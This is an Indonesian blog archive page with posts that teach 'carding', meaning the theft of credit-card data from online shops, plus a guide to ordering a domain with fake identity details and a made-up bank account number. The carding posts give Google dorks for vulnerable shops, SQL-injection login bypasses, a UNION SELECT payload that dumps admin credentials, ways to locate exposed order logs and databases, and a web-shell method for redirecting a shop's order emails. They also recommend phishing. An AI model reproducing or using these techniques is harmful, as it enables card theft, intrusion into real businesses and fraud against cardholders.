Tampilkan postingan dengan label Carding. Tampilkan semua postingan
Tampilkan postingan dengan label Carding. Tampilkan semua postingan

Senin, 24 September 2012

Step by Step Carding

Posted by Unknown 05.43, under , | 4 comments

Step by Step Carding |  Jogjakarta-Cyber4rt
step by step carding kali ini saya membuat tutorial carding , sebenernya ini tutor buat yg cupu kayak saya, ahahahaha

-------------------------------
tools yg di siapkan yaitu:
#.google extractor
#.sql exploiter versi brp aja
-------------------------------

-------------------------------
tahap tahap yg di lakukan 1
#buka google extractor, lalu masukan dork product.asp?id= site:il (harus il, kalo .id tak sumpahin jadi babi)
#trus scan, kalo sudah muncul link" yg kluar silah kan di klick kanan trus remove duplicate, biar ga keder
[Image: 24966_1256326613100_1377657451_30626880_2741170_n.jpg]
#lalu pindah ke TAB sql injector query builder
#masukan argumen tanda tanya(?)di insert arguments here
#kalo sudah klick Build Dan Scan
[Image: 24966_1256327293117_1377657451_30626881_7835278_n.jpg]
#trus ke tab berikut nya yaitu tab attack victim
#cari yg error result nya : unclosed quotation mark before the character ..... ga tau knp pokok nya ikutin aja jgn banyak tanya :p
#klick kanan copy url yg victim
[Image: 24966_1256330213190_1377657451_30626907_5067141_n.jpg]
tahap pemakaian sql exploiter2
#buka sql exploiter trus ke tab attacker for the hackable SHIT !!
#klik add manualy , masukan url yg victim tadi, trus paste (kadang tanda ' harus di hilangkan)
[Image: 24966_1256337133363_1377657451_30626936_8328987_n.jpg]
#kalo udah klick site info sampe info nya keluar
#kalo udah keluar maka tingal get table, maka akan muncul table" web tersebut, yg ku tandai warna biru
[Image: 24966_1256339053411_1377657451_30626940_4075654_n.jpg]
#pilih salah 1 yg ada di table tsbt, yg kira" dimana letak CC nya, trus get columb buat mengetahui colum apa aja di table tsb, tapi x ini aku ga ke table order
#kalo udah muncul smua colomb , drag smua colom trus get data
[Image: 24966_1256343293517_1377657451_30626944_1577372_n.jpg]
tutor ini di tulis dengan keyboard sendiri :p
credit : palembang hacker link dan kamu yg melihat tutor ini

aku ga ngajarin kejahatan lho, cuma buat info aja, kalo di tangkep interpol jgn bawa" nm saya :p

saya cuma manusia biasa yg bertugas sebagai panitia hari kiamat

Minggu, 23 September 2012

TUTORIAL LENGKAP ,ORDER DOMAIN , DOMAIN + HOSTING & FTP ACCOUNT DI STRATO

Posted by Unknown 01.00, under , | No comments

Moga-moga berguna :)

#Ini lanjutan / penjelasan dari Thread ini
List Tutorial :


A.ORDER DOMAIN ONLY : Klik disini untuk Tutorial
B.ORDER DOMAIN + HOSTING : Klik disini untuk Tutorial
C.SETTING FTP & AKSES DI FILEZILLA : Klik disini untuk Tutorial
D.TUTORIAL UPLOAD & INSTALL WORDPRESS : Klik disini untuk Tutorial

-|| ORDER DOMAIN ||-

Ikuti step by step ,jangan ada yang ketinggalan .

1.Buka https://www.strato.nl/
Isikan domain lalu checken

Spoiler: hide
[Image: c.php?f=201111160618054_untitled_4ec2f32d7801d.jpg]
2.Pilih domain (ex: .com .net .org )

3.Cek Domain bisa registrasi atau tidak (vrij
= bisa )

4.Kalo domain bisa didaftarkan ,lalu pilih Selectie overnemen
Spoiler: hide
[Image: c.php?f=201111160157034_1_4ec2b5ff73415.jpg]

5.Pilih paket Strato Domain Nu bestellen
Spoiler: hide
[Image: c.php?f=201111160625364_untitled_4ec2f4f0de835.jpg]

6.Rokok dulu wakaka

7.Generate name di situs http://www.fakenamegenerator.com/gen-male-en-nl.php
Isi semua data ..

8.Pilih PC Plus

9.Pilih Volgende
Spoiler: hide
[Image: c.php?f=201111160212094_4_4ec2b98923d5a.jpg]

10.Pilih Betaalgegevens aanpassen
Spoiler: hide
[Image: c.php?f=201111160213184_5_4ec2b9ce1155f.jpg]

11.Masukkan rekeningnummer 8008xxx ( xxx ,mrupakan 3 digit acak ,ex : 235 ),lalu Volgende
Spoiler: hide
[Image: c.php?f=201111160214564_6_4ec2ba3082cf6.jpg]

12.Centang Ik heb de Algeme lalu plih Bestelling afsluiten
Spoiler: hide
[Image: c.php?f=201111160216274_7_4ec2ba8b75241.jpg]

13.Akan keluar pemberitahuan Order Sukses ,lalu cek email .
Spoiler: hide
[Image: c.php?f=201111160217484_8_4ec2badc1532f.jpg]

Email 1
Spoiler: hide
[Image: c.php?f=201111160219134_email1_4ec2bb31a3c6d.jpg]

Email 2 ( Email ini akan masuk setelah 1 jam email 1 masuk )
Spoiler: hide
[Image: c.php?f=201111160219454_email2_4ec2bb51d9bba.jpg]

14.Pada email ke 3 ,ada link untuk set password ,silahkan klik link tersebut & set password
Email 3 ( Email ini akan masuk setelah 1 jam email 1 masuk )
Spoiler: hide
[Image: c.php?f=201111160220134_email3_4ec2bb6d477e7.jpg]

Cheer Domain sama sudah aktif :)
Silahkan login https://www.strato.nl/apps/CustomerService
Domeinnaam of klantennummer : Adalah nomor yang terdapat pada email ke 2
Wachtwoord : Password yang di set pada langkah 14


Silahkan berkreasi sendiri mendesign web ,atau install wordpress / blogging .
NB : Folder Cgi Bin sma Cgi Data jgn dhapus

Sabtu, 22 September 2012

Tutorial Carding

Posted by Unknown 00.55, under , | 1 comment

Ini berhubungan dengan carding loh, yang pasti anda udah tau semua dengan apa itu carding. Ini hal yang sangat menarik untuk di bahas dalam masalah ini. Ada beberapa teknik yang perlu anda ketahui tentang bagaimana itu carding. Pertama, gw akan jelaskan beberapa teknik menarik yang patut anda pelajari.

1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic
# Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:

admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb

Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :

http://www.namasitusnya.com/shop/admin/shopadmin.asp

Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil :)

2. Shopping Order Log – Informasi Log Order di Server
# Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:

http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt

Selamat menemukan :)

3. Database Information – Database Source Location – Database Path
# Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.

Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb

Selamat mencari.. ^^


4. SQL Injection Advanced Shop Vulnreabilty
# Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.

Contoh:
Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
http://www.targetnya.com/shop/product_details.php?item_id=13
Ganti tulisan itu dengan :
products_rss.php?category_id=1' UNION SELECT concat(login,char(58)
,password),0 FROM va_admins — /*
jadi :http://www.targetnya.com/shop/products_rss.php?category_id=1
‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
dah kalo ada yang errornya kaya gini :

[color="Red"]DB ERROR 1064[/color]

[code]We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

The details of the error are shown below. Please quote this in any correspondance regarding this problem.
Page URL: [url]http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION[/url]
%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2' at line 1
[/code]
Nah klo udah jangan lupa decrypt passwordnya ya :)

5. Admin Shop Send Mail Order
# Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.

Contoh:
Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.
Misal target:
[url]http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php[/url]
Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ’shop24_admin’;
var $db = ’shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto = ‘ben@netboost.com.au‘;

Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.
Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..

6. Phising & Scaming
# Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.
Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.

Nah gitu ajah dech dari gw, selamat berselancar dah, Segala tindak tanduk jadi tanggung jawab loe sendiri
Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!